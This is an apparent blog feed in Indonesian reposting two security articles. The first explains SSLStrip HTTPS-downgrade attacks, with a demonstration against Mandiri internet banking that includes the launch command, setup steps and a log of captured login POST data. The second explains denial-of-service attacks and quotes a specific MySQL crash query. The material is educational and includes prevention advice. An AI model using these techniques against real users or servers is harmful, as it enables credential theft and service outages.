			<content:encoded><![CDATA[<p>Https (http over SSL) sebenarnya adalah protokol yang sangat aman, protokol ini menjamin keamanan data dari browser hingga web server. MITM attack (man in the middle) tidak bisa dilakukan terhadap https karena https memiliki fitur authentication sehingga attacker tidak bisa menyamar sebagai web server. Walaupun mitm attack tidak bisa dilakukan terhadap https, namun attacker tetap bisa menyerang user yang menggunakan http sebagai pintu masuk menuju https. Dalam artikel ini saya akan jelaskan tentang <a href="http://www.thoughtcrime.org/software/sslstrip/index.html" target="_blank">SSLStrip</a>, sebuah tool yang dibuat oleh Moxie Marlinspike untuk melakukan serangan mitm terhadap pengguna situs yang dilindungi dengan https.</p>
<p>&nbsp;</p>
<p><strong>SSL is not vulnerable to MITM attack</strong></p>
<p>MITM attack adalah serangan dimana attacker berada di tengah bebas mendengarkan dan mengubah percakapan antara dua pihak. Jadi dengan serangan MITM ini attacker tidak hanya pasif mendengarkan, tetapi juga aktif mengubah komunikasi yang terjadi. Sebagai contoh, pada percakapan antara Alice dan Bob, Charlie menjadi pihak yang ditengah melakukan MITM attack. Charlie tidak hanya bisa mendengarkan percakapan itu, namun juga bisa mengubah percakapannya. Ketika Alice berkata “Besok makan siang jam 7″, Charlie bisa mengubahnya menjadi “Besok makan siang dibatalkan” sehingga Bob mengira makan siang dengan Alice tidak jadi.</p>
<p>Kenapa MITM attack bisa terjadi? MITM attack bisa terjadi karena sebelum berkomunikasi kedua pihak tidak melakukan authentication. Authentication berguna untuk memastikan identitas pihak yang berkomunikasi, apakah saya sedang berbicara dengan orang yang benar, atau orang ke-3 (the person in the middle) ? Tanpa authentication Alice akan mengira sedang berbicara dengan Bob, sedangkan Bob juga mengira sedang berbicara dengan Alice, padahal bisa jadi sebenarnya Alice sedang berbicara dengan Charlie dan Bob juga sedang berbicara dengan Charlie, sehingga Charlie bertindak sebagai “the person in the middle”. Seharusnya sebelum Alice dan Bob berbicara, harus ada authentication, untuk memastikan “Who are you speaking with?”. Alice harus memastikan “Are you really Bob? Prove it!”, sedangkan Bob juga harus memastikan “Are you really Alice? Prove it!”.</p>
<p>SSL adalah protokol yang memiliki tingkat keamanan sangat tinggi. SSL tidak hanya mengatur tentang enkripsi, namun juga mengatur tentang authentication sehingga SSL tidak rentan terhadap serangan man in the middle. SSL menggunakan sertifikat yang memanfaatkan kunci publik dan kunci private sebagai cara untuk melakukan authentication. Dengan menggunakan sertifikat SSL ini, pengunjung web bisa yakin sedang berkomunikasi dengan web server yang benar, bukan attacker in the middle yang menyamar menjadi web server suatu situs.</p>
<p>Attacker yang mencoba menjadi “the person in the middle”, akan dengan mudah ketahuan karena attacker tidak bisa membuktikan identitasnya dengan sertifikat SSL yang sah. Sertifikat SSL yang sah haruslah ditandatangani oleh CA (certificate authority) yang dipercaya dan tersimpan dalam daftar trusted CA browser. Jadi bila attacker mencoba membuat sertifikat SSL sendiri, browser akan memberi peringatan keras pada pengunjung bahwa sertifikat SSL tidak bisa dipercaya dan pengunjung disarankan untuk membatalkan kunjungan karena beresiko terkena serangan mitm. Serangan mitm attack baru bisa berhasil bila pengunjung tetap bandel dan nekat untuk menggunakan sertifikat palsu tersebut. Bila ini yang terjadi, maka kesalahan ada pada pengguna, bukan kelemahan SSL sebagai protokol. Lebih detil tentang https silakan baca <a href="http://www.ilmuhacking.com/cryptography/understanding-https/" target="_blank">Understanding Https</a>.</p>
<p><strong>HTTPS vs HTTP, Trusted vs Untrusted</strong></p>
<p>http adalah protokol yang tidak bisa dipercaya karena rentan terhadap serangan mitm. Sedangan http over SSL (https) adalah protokol yang bisa dipercaya karena protokol ini tidak rentan terhadap serangan mitm. Informasi yang dilihat  pengunjung pada browser di sebuah page http sebenarnya tidak bisa dipercaya karena tidak ada jaminan integritas dan keontentikan data. Informasi tersebut kemungkinan sudah diubah di tengah jalan atau berasal dari sumber yang tidak otentik (orang lain). dan pengunjung tidak bisa melakukan verifikasi.</p>
<p>Sedangkan informasi yang dilihat pengunjung pada browser di sebuah halaman https bisa dipercaya karena DIJAMIN informasi yang diterima adalah sama dengan yang dikirim web server dan informasi tersebut juga DIJAMIN dikirim oleh web server yang benar. Dulu saya pernah menulis artikel tentang <a href="http://www.ilmuhacking.com/web-security/ibank-vs-www-klikbca/" target="_blank">Trusted vs Untrusted klikBCA</a>, yang menjelaskan tentang adanya dua subdomain yang berbeda, yang trusted menggunakan https dan yang untrusted menggunakan http.</p>
<p><strong>HTTP as Gate to HTTPS</strong></p>
<p>Jarang sekali orang mengunjungi situs dengan mengetikkan https:// bahkan http:// pun orang sudah malas. Kebanyakan orang langsung mengetikkan alamat situs yang ditujunya tanpa harus diawali dengan http:// atau https://. Secara default browser akan berasumsi bahwa pengunjung akan menggunakan protokol http, bukan https bila pengunjung tidak menyebutkan protokolnya.</p>
<p>Kebanyakan situs yang harus memakai https, memang dirancang untuk menerima request melalui http (port 80) atau https (port 443). Situs pada port 80 biasanya hanya dijadikan jembatan untuk menuju situs yang sebenarnya pada port 443. Bila pengunjung masuk melalui port 80, maka server akan memberikan link untuk menuju URL https, atau dengan memberikan response Redirect.</p>
<p>Jadi bisa disimpulkan bahwa sebagian besar pengunjung memasuki https dengan melalui http, dengan kata lain http sebagai gerbang menuju https. Metode peralihan dari situs http ke situs https ada beberapa cara, yaitu:</p>
<ul>
<li>Memberikan link menuju URL https.</li>
<li>Memberikan response redirect ke URL https.</li>
<li>Menggunakan META tag auto refresh ke URL https.</li>
<li>Menggunakan javascript untuk load halaman https.</li>
</ul>
<p><strong>Attacking HTTP, not HTTPS</strong></p>
<p>Sebelumnya sudah saya jelaskan bahwa https adalah protokol yang sangat secure sehingga tidak bisa diserang dengan serangan mitm. Namun mengingat kenyataan bahwa kebanyakan orang mengakses https melalui http, maka attacker memiliki peluang untuk menyerang ketika pengunjung masih berada dalam protokol http.</p>
<p>SSLStrip adalah tool untuk melakukan mitm attack pada protokol http  (bukan HTTPS), dengan maksud untuk menyerang situs-situs yang dilindungi dengan https. SSLStrip sebagai “the person in the middle”, akan mencegah peralihan dari http ke https dengan secara aktif mengubah response dari server sehingga pengunjung akan tetap berada dalam protokol http.</p>
<p>Mari kita lihat beberapa cara peralihan dari http ke https, saya tambahkan cara SSLStrip mencegah peralihan itu:</p>
<ul>
<li>Memberikan link menuju URL https: SSLStrip akan mengubah link berawalan https menjadi http. Sehingga yang muncul di browser korban bukan link ke https melainkan link ke http.</li>
<li>Memberikan response redirect ke URL https: SSLStrip akan mengubah header Location dari URL berawalan https menjadi http.</li>
<li>Menggunakan META tag auto refresh ke URL https: SSLStrip akan mengubah url https menjadi http.</li>
<li>Menggunakan javascript untuk load halaman https: SSLStrip akan mengubah url https menjadi http.</li>
</ul>
<p>Untuk lebih jelasnya berikut adalah gambar yang menunjukkan salah satu cara kerja SSLStrip mencegah korban beralih dari http ke https.</p>
<div id="attachment_1362">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/sslstrip_flow1.png"><img title="sslstrip_flow1" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/sslstrip_flow1-300x178.png" alt="Opening Bank Front Page" width="300" height="178" /></a></li>
</ul>
<p>Opening Bank Front Page</p>
</div>
<p>Pada gambar di atas korban mengakses web server bank dengan URL http://bank/. Request tidak secara langsung dikirim ke web server, namun melalui SSLStrip dulu. SSLStrip meneruskan request tersebut ke web server. Kemudian web server menjawab dengan memberikan html berisi link ke URL https://bank/login/ kepada SSLStrip. Sebelum response html diterima oleh browser, SSLStrip mengubah response tersebut dengan mengubah URL https menjadi http biasa sehingga HTML yang diterima di browser korban berisi link ke URL http://bank/login/ bukan https://bank/login/.</p>
<div id="attachment_1363">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/sslstrip_flow2.png"><img title="sslstrip_flow2" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/sslstrip_flow2-300x178.png" alt="Opening login page" width="300" height="178" /></a></li>
</ul>
<p>Opening login page</p>
</div>
<p>Korban mengklik link pada halaman yang muncul browsernya, tentu saja link ini bukan ke https://bank/login/ melainkan ke http://bank/login/. Dengan cara ini browser tetap dalam protokol http bukan dalam protokol https seperti seharusnya, dengan kata lain SSLStrip berhasil mencegah browser beralih ke protokol https. Request ke http://bank/login/ tersebut dikirimkan ke SSLStrip. Kemudian SSLStrip tidak meneruskan request tersebut ke http://bank/login/, melainkan membuat request baru ke https://bank/login/. Kemudian web server mengirimkan response dari response tersebut ke SSLStrip. Seperti biasanya SSLStrip akan mengubah response dari server tersebut untuk mencegah peralihan ke https. Response yang telah diubah ini kemudian dikirimkan ke browser korban sehingga korban tetap melihat halaman yang sama persis seperti ketika dia membuka https://bank/login/. Dengan tampilan yang sama persis ini, korban mengira sedang membuka https://bank/login/, padahal sebenarnya dia sedang membuka http://bank/login/. Perhatikan bahwa koneksi antara browser dengan SSLStrip adalah dalam http biasa, sedangkan dari SSLStrip ke web server dalam https.</p>
<div id="attachment_1364">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/sslstrip_flow3.png"><img title="sslstrip_flow3" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/sslstrip_flow3-300x178.png" alt="submit username and password" width="300" height="178" /></a></li>
</ul>
<p>submit username and password</p>
</div>
<p>Setelah muncul halaman login dan korban mengira sedang membuka https://bank/login, kemudian korban memasukkan username dan password dan mengklik tombol Login. Browser akan membuat POST request ke http://bank/login/ yang diterima oleh SSLStrip. Karena protokolnya adalah http, maka SSLStrip dengan mudah bisa membaca username dan password yang dimasukkan korban. SSLStrip kemudian akan mengirimkan username dan password korban degan POST request ke https://bank/login/.  Seperti biasa jawaban dari webserver akan dimodifikasi dulu seperlunya oleh SSLStrip sebelum dikirimkan ke browser korban.</p>
<p>Perhatikan bahwa korban sejak awal hingga login mengakses situs dengan http, sedangkan SSLStrip di tengah-tengah membuat koneksi https ke web server yang sebenarnya. Jadi walaupun browser mengakses dengan http, namun response yang diterima browser berasal dari koneksi https yang dibuat oleh SSLStrip.</p>
<p><strong>Case Study: Mandiri Internet Banking</strong></p>
<p>Mari kita coba trik di atas dengan contoh kasus pada situs internet banking Mandiri. Karena ini hanya contoh, saya tidak menggunakan teknik ARP Spoofing untuk melakukan MITM attack yang sesungguhnya. Saya sengaja mengubah setting browser saya agar menggunakan proxy, yaitu SSLStrip. Dalam website <a href="http://www.thoughtcrime.org/software/sslstrip/index.html" target="_blank">SSLStrip</a>, disebutkan seharusnya cara untuk melakukan MITM attack dengan SSLStrip adalah:</p>
<ul>
<li>Setting komputer agar bisa melakukan forwarding paket</li>
<li>Setting iptables untuk mengarahkan traffic HTTP ke SSLStrip</li>
<li>Jalankan SSLStrip</li>
<li>Gunakan ARPSpoof untuk meyakinkan jaringan bahwa traffic harus dikirimkan melalui komputer yang menjalankan SSLStrip.</li>
</ul>
<p>Dalam contoh ini saya tidak melakukan ARPSpoofing, namun saya menggunakan SSLStrip sebagai proxy yang saya setting dalam browser saya. Sehingga setiap traffic http yang dilakukan browser saya akan dikirimkan melalui SSLStrip sebagai man in the middle.</p>
<p>Saya menjalankan SSLStrip di linux dengan IP address 192.168.0.10. Cara menjalankannya mudah sekali, cukup jalankan perintah: python sslstrip.py -l portnumber . Kemudian pada browser saya setting untuk menggunakan proxy 192.168.0.10 dan port sesuai dengan port sslstrip. Untuk lebih jelasnya, perhatikan gambar di bawah ini:</p>
<div id="attachment_1368">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri4.png"><img title="mandiri4" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri4-300x225.png" alt="setting up SSLStrip as proxy in IE" width="300" height="225" /></a></li>
</ul>
<p>setting up SSLStrip as proxy in IE</p>
</div>
<p>Setelah semuanya siap, mari kita coba melakukan serangan mitm. Pada skenario ini, korban akan login ke Mandiri IB tidak dengan mengetikkan https://ib.bankmandiri.co.id, karena korban hanya hafal bankmandiri.co.id saja maka korban langsung mengetikkan bankmandiri.co.id (tanpa diawali www atau http://). Secara default browser akan menganggap korban menghendaki koneksi dengan protokol http, bukan https. Request http tersebut dikirimkan melalui SSLStrip sebagai man in the middle, dan berikut adalah response yang diterima di browser korban. Sebagai pembanding saya juga berikan gambar screenshot halaman depan bank mandiri yang asli (tidak dimodifikasi sslstrip).</p>
<div id="attachment_1369">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri3.png"><img title="mandiri3" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri3-300x249.png" alt="bank mandiri front page modified by sslstrip" width="300" height="249" /></a></li>
</ul>
<p>bank mandiri front page modified by sslstrip</p>
</div>
<div id="attachment_1370">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri7.png"><img title="mandiri7" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri7-300x254.png" alt="real mandiri front page (not modified)" width="300" height="254" /></a></li>
</ul>
<p>real mandiri front page (not modified)</p>
</div>
<p>Login ke Mandiri IB dilakukan dengan mengklik tombol Login di halaman depan bank mandiri. Login tersebut sebenarnya adalah link ke URL https, namun SSLStrip mengubahnya menjadi http agar korban tidak beralih ke modus https. Berikutnya korban akan mengklik tombol Login, sehingga browser akan mengakses URL http://ib.bankmandiri.co.id (bukan https://). Berikut adalah gambar screenshot halaman login Mandiri IB yang telah dimodifikasi sslstrip dan yang masih asli. Kedua gambar di bawah ini sangat mirip, perbedaannya hanya pada penggunaan awalan http:// dan https://. Saya yakin kebanyakan orang tidak akan menyadari bahwa dia sedang menggunakan http biasa, bukan https.</p>
<div id="attachment_1371">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri2.png"><img title="mandiri2" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri2-300x209.png" alt="Mandiri IB login page modified by sslstrip" width="300" height="209" /></a></li>
</ul>
<p>Mandiri IB login page modified by sslstrip</p>
</div>
<div id="attachment_1372">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri6.png"><img title="mandiri6" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri6-300x132.png" alt="real login page, https version and not modified" width="300" height="132" /></a></li>
</ul>
<p>real login page, https version and not modified</p>
</div>
<p>Berikutnya setelah bertemu dengan halaman login, korban akan dengan senang hati memasukkan username dan password. Request tersebut dikirimkan dalam request POST http (bukan https) ke sslstrip. Karena POST dikirim melalui http, maka sslstrip bisa dengan mudah menyimpan username dan password korban.Berikut ini adalah log dari sslstrip yang menangkap username dan password Mandiri IB.</p>
<p>&nbsp;</p>
<div>
<table>
<tbody>
<tr>
<td>
<pre>1
2
3</pre>
</td>
<td>
<pre>2009-05-06 12:00:43,339 Sending header: content-type: application/x-www-form-urlencoded
2009-05-06 12:00:43,339 Sending header: proxy-connection: Keep-Alive
2009-05-06 12:00:43,339 POST Data (ib.bankmandiri.co.id): action=result&amp;userID=sensordong&amp;password=rahasiabangetsensor&amp;image.x=79&amp;image.y=20</pre>
</td>
</tr>
</tbody>
</table>
</div>
<p>Setelah itu sslstrip akan mengirimkan username dan password korban dalam POST request ke URL https (ini adalah url submit yang asli). Response yang diberikan oleh webserver Mandiri IB akan dimodifikasi seperlunya dan dikembalikan ke browser korban. Bila login berhasil, maka korban akan melihat tampilan seperti gambar dibawah ini, sebagai pembanding saya juga sertakan gambar bila menggunakan protokol https.</p>
<div id="attachment_1373">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri1.png"><img title="mandiri1" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri1-300x177.png" alt="login success page in http mode, modified by sslstrip" width="300" height="177" /></a></li>
</ul>
<p>login success page in http mode, modified by sslstrip</p>
</div>
<div id="attachment_1374">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri5.png"><img title="mandiri5" src="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri5-300x143.png" alt="real login success page, https mode, not modified" width="300" height="143" /></a></li>
</ul>
<p>real login success page, https mode, not modified</p>
</div>
<p>Seperti pada halaman login, halaman setelah login berhasil juga sama persis walaupun menggunakan protokol http. Korban tidak akan menyadari bahwa dia sedang menggunakan http, bukannya https karena tampilannya memang tidak ada bedanya.</p>
<p align="justify"><strong>Tips Pencegahan</strong></p>
<p align="justify">Serangan mitm dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https. Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di URL anda bila ingin mengakses situs yang sensitif.</p>
<p align="justify">
<p><em>source: http://www.ilmuhacking.com/web-security/mitm-attack-mandiri-internet-banking-using-sslstrip/</em></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/351/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=351&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/14/mitm-attack-on-mandiri-internet-banking-using-sslstrip/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/sslstrip_flow1-300x178.png" medium="image">
			<media:title type="html">sslstrip_flow1</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/sslstrip_flow2-300x178.png" medium="image">
			<media:title type="html">sslstrip_flow2</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/sslstrip_flow3-300x178.png" medium="image">
			<media:title type="html">sslstrip_flow3</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri4-300x225.png" medium="image">
			<media:title type="html">mandiri4</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri3-300x249.png" medium="image">
			<media:title type="html">mandiri3</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri7-300x254.png" medium="image">
			<media:title type="html">mandiri7</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri2-300x209.png" medium="image">
			<media:title type="html">mandiri2</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri6-300x132.png" medium="image">
			<media:title type="html">mandiri6</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri1-300x177.png" medium="image">
			<media:title type="html">mandiri1</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/05/mandiri5-300x143.png" medium="image">
			<media:title type="html">mandiri5</media:title>
		</media:content>
	</item>
		<item>
		<title>Memahami Serangan Denial of Service</title>
		<link>http://fikforfun.wordpress.com/2011/06/14/memahami-serangan-denial-of-service/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/14/memahami-serangan-denial-of-service/#comments</comments>
		<pubDate>Mon, 13 Jun 2011 18:13:51 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=348</guid>
		<description><![CDATA[Dalam artikel ini saya akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti twitter.com dan metasploit.com. Apa itu DoS Denial of service adalah jenis [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=348&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Dalam artikel ini saya akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti <a href="http://www.wired.com/epicenter/2009/08/twitter-apparently-down/">twitter.com</a> dan <a href="http://blog.metasploit.com/2009/02/pathetic-ddos-vs-security-sites.html">metasploit.com</a>.</p>
<p><strong>Apa itu DoS</strong></p>
<p>Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.</p>
<p>Secara umum ada 2 cara melakukan serangan DoS:</p>
<ol>
<li>Mematikan Server</li>
<li>Menyibukkan Server
<ul>
<li>Tanpa bug/vulnerability</li>
<li>Meng-exploit bug/vulnerability</li>
</ul>
</li>
</ol>
<p><strong>DoS dengan Mematikan Server: Kill Them!</strong></p>
<p>Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.</p>
<p>Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.</p>
<p>Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung  sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.</p>
<p>Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:</p>
<ul>
<ul>
<li>Ping of Death ( <a href="http://www.cert.org/advisories/CA-1996-26.html">CA-1996-26</a> )</li>
</ul>
</ul>
<p>Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.</p>
<ul>
<ul>
<li>MySQL IF Query DoS ( <a href="http://secunia.com/advisories/25188/3/">SA25188</a> )</li>
</ul>
</ul>
<p>Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.</p>
<ul>
<ul>
<li>Cisco Global Site Selector DNS Request Denial of Service (<a href="http://secunia.com/advisories/33429/">SA33429</a>)</li>
</ul>
</ul>
<p>Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.</p>
<p>Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.</p>
<p><strong>DoS dengan Menyibukkan Server: Make Them As Busy As Possible!</strong></p>
<p>Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit.  Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.</p>
<p>Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.</p>
<p>DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan:</p>
<ul>
<li>Exploiting vulnerability: Menyerang dengan malicious request/packet</li>
<li>No vulnerability exploitation: Menyerang dengan normal request/packet</li>
</ul>
<p>Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.</p>
<p><strong>Make Server Busy by Exploiting Vulnerability</strong></p>
<p>Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.</p>
<p>Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik  hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.</p>
<p>Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:</p>
<ul>
<ul>
<li><a href="http://www.securityfocus.com/advisories/1262">TCP SYN Flood DoS</a></li>
</ul>
</ul>
<p>Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.</p>
<p>Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.</p>
<ul>
<ul>
<li><a href="http://vigilance.fr/vulnerability/Apache-httpd-denial-of-service-of-mod-deflate-8851">Apache mod_deflate DoS</a></li>
</ul>
</ul>
<p>Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.</p>
<p>Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.</p>
